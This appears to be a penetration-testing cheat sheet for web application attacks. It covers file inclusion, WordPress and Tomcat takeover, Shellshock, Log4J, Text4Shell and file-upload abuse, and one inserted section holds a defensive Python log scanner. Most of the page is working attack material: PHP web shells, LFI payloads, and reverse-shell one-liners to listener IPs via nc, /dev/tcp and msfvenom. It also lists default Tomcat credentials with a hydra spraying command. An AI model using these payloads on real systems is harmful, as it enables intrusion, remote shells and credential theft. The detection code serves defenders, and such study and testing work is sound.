# General

## HTTP Status Codes

- 100-199: Informational
- 200-299: Success
- 300-399: Redirection
- 400-499: Client error
- 500-599: Server error

## cURL

```bash
# Response headers only (HEAD request)
curl -I <url>

# Send a cookie
curl --cookie "<cookie_name>=<cookie_value>" <url>

# POST request with a form-encoded body
curl -X POST --data "<param1>=<val1>&<param2>=<val2>" <url>

# JSON request (--data-binary implies POST)
curl -H 'Content-Type: application/json; charset=UTF-8' --data-binary '{"<param1>":"<val1>"}' <url>

# URL-encode only part of the request body
curl -d "<param1>=<data1>" --data-urlencode "<param2>=<value2_to_be_encoded>" -X POST <url>
```

## File Inclusion

Directory traversal vulnerabilities allow reading files outside the web root, while file inclusion vulnerabilities go further: the application includes a local or remote file in its own code, so a file that contains PHP is executed rather than merely read.

### LFI

```bash
kali@kali:~$ echo -n '<?php echo system($_GET["cmd"]);?>' | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls

index.php?page=php://filter/resource=/etc/passwd
index.php?page=data://text/plain,<?php%20echo%20system('ls');?>
index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php
```

### RFI

```bash
# Less common than LFI
# In PHP, the allow_url_include option needs to be enabled to leverage RFI

/usr/share/webshells/php/simple-backdoor.php
index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls
```

## Wordpress 404 RCE

{% embed url="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php" %}

`target.tld/wp-content/themes/twentytwentytwo/404.php`

## RCE via Wordpress Plugin Editor

{% embed url="https://github.com/p0dalirius/Wordpress-webshell-plugin" %}

```bash
curl -X POST 'http://target.tld/wp-content/plugins/wp_webshell/wp_webshell.php' --data "action=exec&cmd=cat /tmp/flag"
```

## Shellshock

```bash
nmap -sV -p80 --script http-shellshock --script-args uri=/browser.cgi,cmd=id TARGET
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -iname *flag* 2>/dev/null'" target.tld/path
```

## Log4J

```sh
# Identify
User-Agent: ${jndi:dns://${hostName}.192.168.40.115}
tcpdump -A -i tun0

# Exploit
github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Log4Shell.md
```

## Text4Shell

```sh
# URL encode & deliver via curl due to special chars
${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc IP 443 -e /bin/bash')}
```
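Every technique in the File Inclusion, Shellshock, Log4J and Text4Shell sections above leaves a recognisable string in the request line or a request header, and most of them show up in an ordinary combined-format access log. The following Python is an added example (not from the original page) of a defender-side scan over such a log: it percent-decodes each field twice so double encoding cannot hide a payload, then matches the indicators those sections describe. The log lines are constructed samples, and the parameter names in the `remote_include` pattern are an assumption about what an application might call its include parameter.

```python
import re
from urllib.parse import unquote

# Indicator patterns for the techniques covered above: traversal sequences,
# PHP stream wrappers, remote includes, Log4Shell and Text4Shell lookups and
# the Shellshock function-definition prefix.
INDICATORS = {
    "path_traversal": re.compile(r"\.\.[/\\]"),
    "php_wrapper": re.compile(r"\b(php|data|expect|phar|zip)://", re.I),
    "remote_include": re.compile(r"[?&](page|file|include|template|path)=https?://", re.I),
    "log4shell": re.compile(r"\$\{\s*jndi\s*:", re.I),
    "text4shell": re.compile(r"\$\{\s*(script|dns|url)\s*:", re.I),
    "shellshock": re.compile(r"\(\s*\)\s*\{"),
}

# Apache/nginx "combined" log format: request line, referer and user-agent are
# the three attacker-controlled fields worth scanning.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def normalize(value):
    """Percent-decode twice so double encoding (e.g. %252F) cannot hide a payload."""
    return unquote(unquote(value))


def scan_line(line):
    """Return (indicator, field) pairs found in one combined-format log line."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a combined-format line; a real pipeline would count these
    hits = []
    for field in ("req", "ref", "ua"):
        text = normalize(m.group(field))
        for name, rx in INDICATORS.items():
            if rx.search(text):
                hits.append((name, field))
    return hits


def scan_log(lines):
    """Scan many lines; returns (line_number, indicator, field) tuples."""
    return [(n, name, field)
            for n, line in enumerate(lines, 1)
            for name, field in scan_line(line)]


# Constructed sample log lines (not taken from any real system).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 404 221 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?page=http://198.51.100.7/shell.txt HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:43 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:dns://198.51.100.7}"',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; /bin/id"',
    '203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "GET /search?q=%24%7Bscript%3Ajavascript%3A1%7D HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, name, field in scan_log(SAMPLE_LOG):
        print(f"line {n}: {name} in {field}")
```

Run against the samples, every line except the first produces one finding. Two caveats apply in practice: the Log4Shell and Text4Shell indicators only work if the log records the header or parameter the lookup was sent in (tcpdump on the DNS callback, as the Log4J section shows, is the other half of the picture), and the double decode is deliberate so that `%252e%252e%252f` is seen as `../` just as a double-decoding application would see it.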

## File Uploads

{% embed url="https://book.hacktricks.xyz/pentesting-web/file-upload" %}

```bash
# Payload in exif data
exiftool -UserComment='sh -i >& /dev/tcp/192.168.45.199/4444 0>&1' qais.jpg
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' qais.jpg
```

### Web Shells

```html
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
```

```php
<?php echo system('id'); ?>
```

```php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
```

#### ASPX Upload

{% embed url="https://raw.githubusercontent.com/tennc/webshell/refs/heads/master/fuzzdb-webshell/asp/cmd.aspx" %}

* /usr/share/webshells/aspx/cmdasp.aspx

### Bypasses

{% embed url="https://en.wikipedia.org/wiki/List_of_file_signatures" %}

```bash
cat shell.php
GIF89a;
<?php system($_GET['cmd']); ?>

file shell.php 
shell.php: GIF image data, version 89a, 2619 x 16188

shell.php?cmd=/usr/bin/busybox nc 192.168.45.202 4444 -e sh
```

### Webdav

{% embed url="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/put-method-webdav" %}

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.206 LPORT=4444 -f exe > reverse.exe
cadaver hutch.offsec
dav:/> put reverse.exe
/c c:\Inetpub\wwwroot\reverse.exe # Trigger via cmd.aspx
```

## GIT

{% embed url="https://github.com/gitleaks/gitleaks" %}

```bash
# Exposed /.git directory
wget -r http://target.com/.git/
cd target.com
git branch
git checkout branch/1
git diff
git log
git show c9c8e8bd0a4b373190c4258e16e07a6296d4e43c
git show 44a055daf7a0cd777f28f444c0d29ddf3ff08c54

# GUI
git-cola
```

## Tomcat

```sh
# Default Creds
tomcat:s3cret
tomcat:tomcat
admin:tomcat
admin:admin
admin:

# Spray
hydra -l tomcat -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -f IP http-get /manager/html

# Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.14.30.76 LPORT=443 -f war -o revshell.war 
nc -lvnp 443
```
